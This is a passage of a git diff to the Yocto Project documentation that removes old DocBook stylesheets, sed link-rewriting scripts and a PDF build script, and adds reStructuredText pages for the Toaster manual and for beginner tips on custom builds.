-.variablelist dl dt span.term {
- color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
- border-color: #aaa;
-}
-
-pre.programlisting {
- color: black;
- background-color: #fff;
- border-color: #aaa;
- border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
- background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
- background-color: #eee;
- border-color: #999;
-}
-
-
-div.navheader {
- border-color: black;
-}
-
-
-div.navfooter {
- border-color: black;
-}
-
-
- /*********** /
- / graphics /
-/ ***********/
-
-/*
-body {
- background-image: url("images/body_bg.jpg");
- background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
- background-image: url("images/note_bg.jpg");
- background-attachment: fixed;
-}
-
-.warning,
-.caution {
- background-image: url("images/warning_bg.jpg");
- background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
- background-image: url("images/figure_bg.jpg");
- background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
- background-image: url("figures/white-on-black.png");
- background-position: center;
- background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
- background: none;
-}
-
-
-h1.title {
- background-color: transparent;
- background-repeat: no-repeat;
- height: 256px;
- text-indent: -9000px;
- overflow:hidden;
-}
-
-h2.subtitle {
- background-color: transparent;
- text-indent: -9000px;
- overflow:hidden;
- width: 0px;
- display: none;
-}
-
- /*************************************** /
- / pippin.gimp.org specific alterations /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
- color: #777;
- font-size: 80%;
- padding: 0;
- margin: 0;
- text-align: left;
- position: absolute;
- top: 0px;
- left: 0px;
- width: 100%;
- height: 50px;
- background: url('/gfx/heading_bg.png') transparent;
- background-repeat: repeat-x;
- background-attachment: fixed;
- border: none;
-}
-
-div.heading a {
- color: #444;
-}
-
-div.footing, div.navfooter {
- border: none;
- color: #ddd;
- font-size: 80%;
- text-align:right;
-
- width: 100%;
- padding-top: 10px;
- position: absolute;
- bottom: 0px;
- left: 0px;
-
- background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
- /****************** /
- / nasty ie tweaks /
-/ ******************/
-
-/*
-div.heading, div.navheader {
- width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
- width:expression(document.body.clientWidth + "px");
- margin-left:expression("-5em");
-}
-body {
- padding:expression("4em 5em 0em 5em");
-}
-*/
-
- /**************************************** /
- / mozilla vendor specific css extensions /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
- -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
- -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
- -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
- display: none;
-}
-
-
-hr {
- display: none;
-}
-
-table {
- border: 0em;
-}
-
- .photo {
- float: right;
- margin-left: 1.5em;
- margin-bottom: 1.5em;
- margin-top: 0em;
- max-width: 17em;
- border: 1px solid gray;
- padding: 3px;
- background: white;
-}
- .seperator {
- padding-top: 2em;
- clear: both;
- }
-
- #validators {
- margin-top: 5em;
- text-align: right;
- color: #777;
- }
- @media print {
- body {
- font-size: 8pt;
- }
- .noprint {
- display: none;
- }
- }
-
-
-.tip,
-.note {
- background: #f0f0f2;
- color: #333;
- padding: 20px;
- margin: 20px;
-}
-
-.tip h3,
-.note h3 {
- padding: 0em;
- margin: 0em;
- font-size: 2em;
- font-weight: bold;
- color: #333;
-}
-
-.tip a,
-.note a {
- color: #333;
- text-decoration: underline;
-}
-
-.footnote {
- font-size: small;
- color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
- font-size:large;
- color: #00557D;
-}
diff --git a/documentation/toaster-manual/toaster-manual.rst b/documentation/toaster-manual/toaster-manual.rst
new file mode 100644
index 0000000000..b003f1ceaa
--- /dev/null
+++ b/documentation/toaster-manual/toaster-manual.rst
@@ -0,0 +1,19 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+===================
+Toaster User Manual
+===================
+
+|
+
+.. toctree::
+ :caption: Table of Contents
+ :numbered:
+
+ toaster-manual-intro
+ toaster-manual-start
+ toaster-manual-setup-and-use
+ toaster-manual-reference
+ history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/toaster-manual/toaster-manual.xml b/documentation/toaster-manual/toaster-manual.xml
deleted file mode 100755
index 03db6bed3a..0000000000
--- a/documentation/toaster-manual/toaster-manual.xml
+++ /dev/null
@@ -1,178 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='toaster-manual' lang='en'
- xmlns:xi="http://www.w3.org/2003/XInclude"
- xmlns="http://docbook.org/ns/docbook"
- >
- <bookinfo>
-
- <mediaobject>
- <imageobject>
- <imagedata fileref='figures/toaster-title.png'
- format='SVG'
- align='left' scalefit='1' width='100%'/>
- </imageobject>
- </mediaobject>
-
- <title>
- Toaster User Manual
- </title>
-
- <authorgroup>
- <author>
- <affiliation>
- <orgname>&ORGNAME;</orgname>
- </affiliation>
- <email>&ORGEMAIL;</email>
- </author>
- </authorgroup>
-
- <revhistory>
- <revision>
- <revnumber>1.8</revnumber>
- <date>April 2015</date>
- <revremark>The initial document released with the Yocto Project 1.8 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.0</revnumber>
- <date>October 2015</date>
- <revremark>Released with the Yocto Project 2.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.1</revnumber>
- <date>April 2016</date>
- <revremark>Released with the Yocto Project 2.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.2</revnumber>
- <date>October 2016</date>
- <revremark>Released with the Yocto Project 2.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.3</revnumber>
- <date>May 2017</date>
- <revremark>Released with the Yocto Project 2.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.4</revnumber>
- <date>October 2017</date>
- <revremark>Released with the Yocto Project 2.4 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.5</revnumber>
- <date>May 2018</date>
- <revremark>Released with the Yocto Project 2.5 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.6</revnumber>
- <date>November 2018</date>
- <revremark>Released with the Yocto Project 2.6 Release.</revremark>
- </revision>
- <revision>
- <revnumber>2.7</revnumber>
- <date>May 2019</date>
- <revremark>Released with the Yocto Project 2.7 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.0</revnumber>
- <date>October 2019</date>
- <revremark>Released with the Yocto Project 3.0 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1</revnumber>
- <date>April 2020</date>
- <revremark>Released with the Yocto Project 3.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.1</revnumber>
- <date>June 2020</date>
- <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.2</revnumber>
- <date>August 2020</date>
- <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.3</revnumber>
- <date>October 2020</date>
- <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
- </revision>
- <revision>
- <revnumber>3.1.4</revnumber>
- <date>&REL_MONTH_YEAR;</date>
- <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
- </revision>
- </revhistory>
-
- <copyright>
- <year>&COPYRIGHT_YEAR;</year>
- <holder>Linux Foundation</holder>
- </copyright>
-
- <legalnotice>
- <para>
- Permission is granted to copy, distribute and/or modify this document under
- the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by Creative Commons.
- </para>
- <note><title>Manual Notes</title>
- <itemizedlist>
- <listitem><para>
- This version of the
- <emphasis>Toaster User Manual</emphasis>
- is for the &YOCTO_DOC_VERSION; release of the
- Yocto Project.
- To be sure you have the latest version of the manual
- for this release, go to the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual from that site.
- Manuals from the site are more up-to-date than manuals
- derived from the Yocto Project released TAR files.
- </para></listitem>
- <listitem><para>
- If you located this manual through a web search, the
- version of the manual might not be the one you want
- (e.g. the search might have returned a manual much
- older than the Yocto Project version with which you
- are working).
- You can see all Yocto Project major releases by
- visiting the
- <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
- page.
- If you need a version of this manual for a different
- Yocto Project release, visit the
- <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
- and select the manual set by using the
- "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
- pull-down menus.
- </para></listitem>
- <listitem>
- <para>
- To report any inaccuracies or problems with this
- (or any other Yocto Project) manual, send an email to
- the Yocto Project documentation mailing list at
- <filename>docs@lists.yoctoproject.org</filename> or
- log into the freenode <filename>#yocto</filename> channel.
- </para>
- </listitem>
- </itemizedlist>
- </note>
-
- </legalnotice>
-
- </bookinfo>
-
- <xi:include href="toaster-manual-intro.xml"/>
-
- <xi:include href="toaster-manual-start.xml"/>
-
- <xi:include href="toaster-manual-setup-and-use.xml"/>
-
- <xi:include href="toaster-manual-reference.xml"/>
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/tools/eclipse-help.sed b/documentation/tools/eclipse-help.sed
deleted file mode 100644
index ab5c9affd4..0000000000
--- a/documentation/tools/eclipse-help.sed
+++ /dev/null
@@ -1,18 +0,0 @@
-# Process poky-ref-manual and yocto-project-qs manual (<word>-<word>-<word> style)
-# For example:
-# "ulink" href="http://www.yoctoproject.org/docs/1.3/poky-ref-manual/poky-ref-manual.html#faq"
-# -> "link" href="../poky-ref-manual/faq.html"
-s@"ulink" href="http://www.yoctoproject.org/docs/[^/]*/([a-z]*-[a-z]*-[a-z]*)/[a-z]*-[a-z]*-[a-z]*.html#([^"]*)"/@"link" href="../1/2.html"@g
-
-# Processes all other manuals (<word>-<word> style)
-# For example:
-# "ulink" href="http://www.yoctoproject.org/docs/1.3/kernel-manual/kernel-manual.html#faq"
-# -> "link" href="../kernel-manual/faq.html"
-s@"ulink" href="http://www.yoctoproject.org/docs/[^/]*/([a-z]*-[a-z]*)/[a-z]*-[a-z]*.html#([^"]*)"@"link" href="../1/2.html"@g
-
-# Process cases where just an external manual is referenced without an id anchor
-# For example:
-# "ulink" href="http://www.yoctoproject.org/docs/1.3/kernel-manual/kernel-manual.html
-# -> "link" href="../kernel-manual/index.html"
-s@"ulink" href="http://www.yoctoproject.org/docs/[^/]*/([a-z]*-[a-z]*-[a-z]*)/[a-z]*-[a-z]*-[a-z]*.html"@"link" href="../1/index.html"@g
-s@"ulink" href="http://www.yoctoproject.org/docs/[^/]*/([a-z]*-[a-z]*)/[a-z]*-[a-z]*.html"@"link" href="../1/index.html"@g
diff --git a/documentation/tools/mega-manual.sed b/documentation/tools/mega-manual.sed
deleted file mode 100644
index 12e0e6145b..0000000000
--- a/documentation/tools/mega-manual.sed
+++ /dev/null
@@ -1,36 +0,0 @@
-# Processes bitbake-user-manual (<word>-<word>-<word> style).
-# This style is for manual three-word folders, which currently is only the BitBake User Manual.
-# We used to have the "yocto-project-qs" and "poky-ref-manual" folders but no longer do.
-# s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/[a-z]*-[a-z]*-[a-z]*/[a-z]*-[a-z]*-[a-z]*.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/bitbake-user-manual/bitbake-user-manual.html#@"link" href="#@g
-
-# Processes all other manuals (<word>-<word> style).
-# This style is for manual folders that use two word, which is the standard now (e.g. "ref-manual").
-# Here is the one-liner:
-# s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/[a-z]*-[a-z]*/[a-z]*-[a-z]*.html#@"link" href="#@g
-
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/sdk-manual/sdk-manual.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/bsp-guide/bsp-guide.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/dev-manual/dev-manual.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/overview-manual/overview-manual.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/brief-yoctoprojectqs/brief-yoctoprojectqs.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/kernel-dev/kernel-dev.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/profile-manual/profile-manual.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/ref-manual/ref-manual.html#@"link" href="#@g
-s@"ulink" href="http://www.yoctoproject.org/docs/3.1.4/toaster-manual/toaster-manual.html#@"link" href="#@g
-
-# Process cases where just an external manual is referenced without an id anchor
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/brief-yoctoprojectqs/brief-yoctoprojectqs.html" target="_top">Yocto Project Quick Build</a>@Yocto Project Quick Build@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/bitbake-user-manual/bitbake-user-manual.html" target="_top">BitBake User Manual</a>@BitBake User Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/dev-manual/dev-manual.html" target="_top">Yocto Project Development Tasks Manual</a>@Yocto Project Development Tasks Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/overview-manual/overview-manual.html" target="_top">Yocto Project Overview and Concepts Manual</a>@Yocto project Overview and Concepts Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/sdk-manual/sdk-manual.html" target="_top">Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</a>@Yocto Project Application Development and the Extensible Software Development Kit (eSDK)@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/bsp-guide/bsp-guide.html" target="_top">Yocto Project Board Support Package (BSP) Developer's Guide</a>@Yocto Project Board Support Package (BSP) Developer's Guide@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/profile-manual/profile-manual.html" target="_top">Yocto Project Profiling and Tracing Manual</a>@Yocto Project Profiling and Tracing Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/kernel-dev/kernel-dev.html" target="_top">Yocto Project Linux Kernel Development Manual</a>@Yocto Project Linux Kernel Development Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/ref-manual/ref-manual.html" target="_top">Yocto Project Reference Manual</a>@Yocto Project Reference Manual@g
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/toaster-manual/toaster-manual.html" target="_top">Toaster User Manual</a>@Toaster User Manual@g
-
-# Process a single, rouge occurrence of a linked reference to the Mega-Manual.
-s@<a class="ulink" href="http://www.yoctoproject.org/docs/3.1.4/mega-manual/mega-manual.html" target="_top">Yocto Project Mega-Manual</a>@Yocto Project Mega-Manual@g
-
diff --git a/documentation/tools/poky-docbook-to-pdf b/documentation/tools/poky-docbook-to-pdf
deleted file mode 100755
index f55fd278af..0000000000
--- a/documentation/tools/poky-docbook-to-pdf
+++ /dev/null
@@ -1,51 +0,0 @@
-#!/bin/sh
-
-if [ -z "$1" -o -z "$2" ]; then
- echo "usage: [-v] $0 <docbook file> <templatedir>"
- echo
- echo "*NOTE* you need xsltproc, fop and nwalsh docbook stylesheets"
- echo " installed for this to work!"
- echo
- exit 0
-fi
-
-FO=`echo $1 | sed s/.xml/.fo/` || exit 1
-PDF=`echo $1 | sed s/.xml/.pdf/` || exit 1
-TEMPLATEDIR=$2
-
-##
-# These URI should be rewritten by your distribution's xml catalog to
-# match your localy installed XSL stylesheets.
-XSL_BASE_URI="http://docbook.sourceforge.net/release/xsl/current"
-
-# Creates a temporary XSL stylesheet based on titlepage.xsl
-xsltproc -o /tmp/titlepage.xsl \
- --xinclude \
- $XSL_BASE_URI/template/titlepage.xsl \
- $TEMPLATEDIR/titlepage.templates.xml || exit 1
-
-# Creates the file needed for FOP
-xsltproc --xinclude \
- --stringparam hyphenate false \
- --stringparam formal.title.placement "figure after" \
- --stringparam ulink.show 1 \
- --stringparam body.font.master 9 \
- --stringparam title.font.master 11 \
- --stringparam draft.watermark.image "$TEMPLATEDIR/draft.png" \
- --stringparam chapter.autolabel 1 \
- --stringparam appendix.autolabel A \
- --stringparam section.autolabel 1 \
- --stringparam section.label.includes.component.label 1 \
- --output $FO \
- $TEMPLATEDIR/poky-db-pdf.xsl \
- $1 || exit 1
-
-# Invokes the Java version of FOP. Uses the additional configuration file common/fop-config.xml
-fop -c $TEMPLATEDIR/fop-config.xml -fo $FO -pdf $PDF || exit 1
-
-rm -f $FO
-rm -f /tmp/titlepage.xsl
-
-echo
-echo " #### Success! $PDF ready. ####"
-echo
diff --git a/documentation/tools/update-documentation-conf b/documentation/tools/update-documentation-conf
index 3f8d280093..adfca3ca50 100644
--- a/documentation/tools/update-documentation-conf
+++ b/documentation/tools/update-documentation-conf
@@ -1,23 +1,13 @@
#!/usr/bin/env python
-
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
# documentation.conf update script
#
# Author: Paul Eggleton <paul.eggleton@linux.intel.com>
#
# Copyright (C) 2015 Intel Corporation
#
-# This program is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License version 2 as
-# published by the Free Software Foundation.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License along
-# with this program; if not, write to the Free Software Foundation, Inc.,
-# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import sys
diff --git a/documentation/transitioning-to-a-custom-environment.rst b/documentation/transitioning-to-a-custom-environment.rst
new file mode 100644
index 0000000000..b87fec6893
--- /dev/null
+++ b/documentation/transitioning-to-a-custom-environment.rst
@@ -0,0 +1,116 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+=============================================================
+Transitioning to a custom environment for systems development
+=============================================================
+
+|
+
+.. note::
+
+ So you've finished the :doc:`brief-yoctoprojectqs/brief-yoctoprojectqs` and
+ glanced over the document :doc:`what-i-wish-id-known`, the latter contains
+ important information learned from other users. You're well prepared. But
+ now, as you are starting your own project, it isn't exactly straightforward what
+ to do. And, the documentation is daunting. We've put together a few hints to
+ get you started.
+
+#. **Make a list of the processor, target board, technologies, and capabilities
+ that will be part of your project**.
+ You will be finding layers with recipes and other metadata that support these
+ things, and adding them to your configuration. (See #3)
+
+#. **Set up your board support**.
+ Even if you're using custom hardware, it might be easier to start with an
+ existing target board that uses the same processor or at least the same
+ architecture as your custom hardware. Knowing the board already has a
+ functioning Board Support Package (BSP) within the project makes it easier
+ for you to get comfortable with project concepts.
+
+#. **Find and acquire the best BSP for your target**.
+ Use the :yocto_home:`Yocto Project curated layer index
+ </software-overview/layers/>` or even the `OpenEmbedded layer index
+ <https://layers.openembedded.org>`_ to find and acquire the best BSP for your
+ target board. The Yocto Project layer index BSPs are regularly validated. The
+ best place to get your first BSP is from your silicon manufacturer or board
+ vendor – they can point you to their most qualified efforts. In general, for
+ Intel silicon use meta-intel, for Texas Instruments use meta-ti, and so
+ forth. Choose a BSP that has been tested with the same Yocto Project release
+ that you've downloaded. Be aware that some BSPs may not be immediately
+ supported on the very latest release, but they will be eventually.
+
+ You might want to start with the build specification that Poky provides
+ (which is reference embedded distribution) and then add your newly chosen
+ layers to that. Here is the information :ref:`about adding layers
+ <dev-manual/dev-manual-common-tasks:Understanding and Creating Layers>`.
+
+#. **Based on the layers you've chosen, make needed changes in your
+ configuration**.
+ For instance, you've chosen a machine type and added in the corresponding BSP
+ layer. You'll then need to change the value of the ``MACHINE`` variable in your
+ configuration file (build/local.conf) to point to that same machine
+ type. There could be other layer-specific settings you need to change as
+ well. Each layer has a ``README`` document that you can look at for this type of
+ usage information.
+
+#. **Add a new layer for any custom recipes and metadata you create**.
+ Use the ``bitbake-layers create-layer`` tool for Yocto Project 2.4+
+ releases. If you are using a Yocto Project release earlier than 2.4, use the
+ ``yocto-layer create`` tool. The ``bitbake-layers`` tool also provides a number
+ of other useful layer-related commands. See
+ :ref:`dev-manual/dev-manual-common-tasks:creating a general layer using the
+ \`\`bitbake-layers\`\` script` section.
+
+#. **Create your own layer for the BSP you're going to use**.
+ It is not common that you would need to create an entire BSP from scratch
+ unless you have a *really* special device. Even if you are using an existing
+ BSP, :ref:`create your own layer for the BSP <bsp-guide/bsp:creating a new
+ bsp layer using the \`\`bitbake-layers\`\` script>`. For example, given a
+ 64-bit x86-based machine, copy the conf/intel-corei7-64 definition and give
+ the machine a relevant name (think board name, not product name). Make sure
+ the layer configuration is dependent on the meta-intel layer (or at least,
+ meta-intel remains in your bblayers.conf). Now you can put your custom BSP
+ settings into your layer and you can re-use it for different applications.
+
+#. **Write your own recipe to build additional software support that isn't
+ already available in the form of a recipe**.
+ Creating your own recipe is especially important for custom application
+ software that you want to run on your device. Writing new recipes is a
+ process of refinement. Start by getting each step of the build process
+ working beginning with fetching all the way through packaging. Next, run the
+ software on your target and refine further as needed. See :ref:`Writing a New
+ Recipe <dev-manual/dev-manual-common-tasks:writing a new recipe>` in the
+ Yocto Project Development Tasks Manual for more information.
+
+#. **Now you're ready to create an image recipe**.
+ There are a number of ways to do this. However, it is strongly recommended
+ that you have your own image recipe - don't try appending to existing image
+ recipes. Recipes for images are trivial to create and you usually want to
+ fully customize their contents.
+
+#. **Build your image and refine it**.
+ Add what's missing and fix anything that's broken using your knowledge of the
+ :ref:`workflow <sdk-manual/sdk-extensible:using \`\`devtool\`\` in your sdk
+ workflow>` to identify where issues might be occurring.
+
+#. **Consider creating your own distribution**.
+ When you get to a certain level of customization, consider creating your own
+ distribution rather than using the default reference distribution.
+
+ Distribution settings define the packaging back-end (e.g. rpm or other) as
+ well as the package feed and possibly the update solution. You would create
+ your own distribution in a new layer inheriting from Poky but overriding what
+ needs to change for your distribution. If you find yourself adding a lot of
+ configuration to your local.conf file aside from paths and other typical
+ local settings, it's time to :ref:`consider creating your own distribution
+ <dev-manual/dev-manual-common-tasks:creating your own distribution>`.
+
+ You can add product specifications that can customize the distribution if
+ needed in other layers. You can also add other functionality specific to the
+ product. But to update the distribution, not individual products, you update
+ the distribution feature through that layer.
+
+#. **Congratulations! You're well on your way.**
+ Welcome to the Yocto Project community.
+
+.. include:: /boilerplate.rst
diff --git a/documentation/what-i-wish-id-known.rst b/documentation/what-i-wish-id-known.rst
new file mode 100644
index 0000000000..593c6fe149
--- /dev/null
+++ b/documentation/what-i-wish-id-known.rst
@@ -0,0 +1,226 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+=========================================
+What I wish I'd known about Yocto Project
+=========================================
+
+|
+
+.. note::
+
+ Before reading further, make sure you've taken a look at the
+ :yocto_home:`Software Overview</software-overview>` page which presents the
+ definitions for many of the terms referenced here. Also, know that some of the
+ information here won't make sense now, but as you start developing, it is the
+ information you'll want to keep close at hand. These are best known methods for
+ working with Yocto Project and they are updated regularly.
+
+Using the Yocto Project is fairly easy, *until something goes wrong*. Without an
+understanding of how the build process works, you'll find yourself trying to
+troubleshoot "a black box". Here are a few items that new users wished they had
+known before embarking on their first build with Yocto Project. Feel free to
+contact us with other suggestions.
+
+#. **Use Git, not the tarball download:**
+ If you use git the software will be automatically updated with bug updates
+ because of how git works. If you download the tarball instead, you will need
+ to be responsible for your own updates.
+
+#. **Get to know the layer index:**
+ All layers can be found in the `layer index
+ <https://layers.openembedded.org/>`_. Layers which have applied for Yocto
+ Project Compatible status (structure continuity assurance and testing) can be
+ found in the :yocto_home:`Yocto Project Compatible index
+ </software-over/layer/>`. Generally check the Compatible layer index first,
+ and if you don't find the necessary layer check the general layer index. The
+ layer index is an original artifact from the Open Embedded Project. As such,
+ that index doesn't have the curating and testing that the Yocto Project
+ provides on Yocto Project Compatible layer list, but the latter has fewer
+ entries. Know that when you start searching in the layer index that not all
+ layers have the same level of maturity, validation, or usability. Nor do
+ searches prioritize displayed results. There is no easy way to help you
+ through the process of choosing the best layer to suit your needs.
+ Consequently, it is often trial and error, checking the mailing lists, or
+ working with other developers through collaboration rooms that can help you
+ make good choices.
+
+#. **Use existing BSP layers from silicon vendors when possible:**
+ Intel, TI, NXP and others have information on what BSP layers to use with
+ their silicon. These layers have names such as "meta-intel" or "meta-ti". Try
+ not to build layers from scratch. If you do have custom silicon, use one of
+ these layers as a guide or template and familiarize yourself with the
+ :doc:`bsp-guide/bsp-guide`.
+
+#. **Do not put everything into one layer:**
+ Use different layers to logically separate information in your build. As an
+ example, you could have a BSP layer, a GUI layer, a distro configuration,
+ middleware, or an application (e.g. "meta-filesystems", "meta-python",
+ "meta-intel", and so forth). Putting your entire build into one layer limits
+ and complicates future customization and reuse. Isolating information into
+ layers, on the other hand, helps keep simplify future customizations and
+ reuse.
+
+#. **Never modify the POKY layer. Never. Ever. When you update to the next
+ release, you'll lose all of your work. ALL OF IT.**
+
+#. **Don't be fooled by documentation searching results:**
+ Yocto Project documentation is always being updated. Unfortunately, when you
+ use Google to search for Yocto Project concepts or terms, Google consistently
+ searches and retrieves older versions of Yocto Project manuals. For example,
+ searching for a particular topic using Google could result in a "hit" on a
+ Yocto Project manual that is several releases old. To be sure that you are
+ using the most current Yocto Project documentation, use the drop-down menu at
+ the top of any of its page.
+
+ Many developers look through the :yocto_docs:`All-in-one 'Mega' Manual </singleindex.html>`
+ for a concept or term by doing a search through the whole page. This manual
+ is a concatenation of the core set of Yocto Project manual. Thus, a simple
+ string search using Ctrl-F in this manual produces all the "hits" for a
+ desired term or concept. Once you find the area in which you are
+ interested, you can display the actual manual, if desired. It is also
+ possible to use the search bar in the menu or in the left navigation pane.
+
+#. **Understand the basic concepts of how the build system works: the workflow:**
+ Understanding the Yocto Project workflow is important as it can help you both
+ pinpoint where trouble is occurring and how the build is breaking. The
+ workflow breaks down into the following steps:
+
+ #. Fetch – get the source code
+ #. Extract – unpack the sources
+ #. Patch – apply patches for bug fixes and new capability
+ #. Configure – set up your environment specifications
+ #. Build – compile and link
+ #. Install – copy files to target directories
+ #. Package – bundle files for installation
+
+ During "fetch", there may be an inability to find code. During "extract",
+ there is likely an invalid zip or something similar. In other words, the
+ function of a particular part of the workflow gives you an idea of what might
+ be going wrong.
+
+ .. image:: figures/yp-how-it-works-new-diagram.png
+
+#. **Know that you can generate a dependency graph and learn how to do it:**
+ A dependency graph shows dependencies between recipes, tasks, and targets.
+ You can use the "-g" option with BitBake to generate this graph. When you
+ start a build and the build breaks, you could see packages you have no clue
+ about or have any idea why the build system has included them. The
+ dependency graph can clarify that confusion. You can learn more about
+ dependency graphs and how to generate them in the
+ :ref:`bitbake-user-manual/bitbake-user-manual-intro:generating dependency
+ graphs` section in the BitBake User Manual.
+
+#. **Here's how you decode "magic" folder names in tmp/work:**
+ The build system fetches, unpacks, preprocesses, and builds. If something
+ goes wrong, the build system reports to you directly the path to a folder
+ where the temporary (build/tmp) files and packages reside resulting from the
+ build. For a detailed example of this process, see the :yocto_wiki:`example
+ </Cookbook:Example:Adding_packages_to_your_OS_image>`. Unfortunately this
+ example is on an earlier release of Yocto Project.
+
+ When you perform a build, you can use the "-u" BitBake command-line option to
+ specify a user interface viewer into the dependency graph (e.g. knotty,
+ ncurses, or taskexp) that helps you understand the build dependencies better.
+
+#. **You can build more than just images:**
+ You can build and run a specific task for a specific package (including
+ devshell) or even a single recipe. When developers first start using the
+ Yocto Project, the instructions found in the
+ :doc:`brief-yoctoprojectqs/brief-yoctoprojectqs` show how to create an image
+ and then run or flash that image. However, you can actually build just a
+ single recipe. Thus, if some dependency or recipe isn't working, you can just
+ say "bitbake foo" where "foo" is the name for a specific recipe. As you
+ become more advanced using the Yocto Project, and if builds are failing, it
+ can be useful to make sure the fetch itself works as desired. Here are some
+ valuable links: :ref:`dev-manual/dev-manual-common-tasks:Using a Development
+ Shell` for information on how to build and run a specific task using
+ devshell. Also, the :ref:`SDK manual shows how to build out a specific recipe
+ <sdk-devtool-use-devtool-modify-to-modify-the-source-of-an-existing-component>`.
+
+#. **An ambiguous definition: Package vs Recipe:**
+ A recipe contains instructions the build system uses to create
+ packages. Recipes and Packages are the difference between the front end and
+ the result of the build process.
+
+ As mentioned, the build system takes the recipe and creates packages from the
+ recipe's instructions. The resulting packages are related to the one thing
+ the recipe is building but are different parts (packages) of the build
+ (i.e. the main package, the doc package, the debug symbols package, the
+ separate utilities package, and so forth). The build system splits out the
+ packages so that you don't need to install the packages you don't want or
+ need, which is advantageous because you are building for small devices when
+ developing for embedded and IoT.
+
+#. **You will want to learn about and know what's packaged in rootfs.**
+
+#. **Create your own image recipe:**
+ There are a number of ways to create your own image recipe. We suggest you
+ create your own image recipe as opposed to appending an existing recipe. It
+ is trivial and easy to write an image recipe. Again, do not try appending to
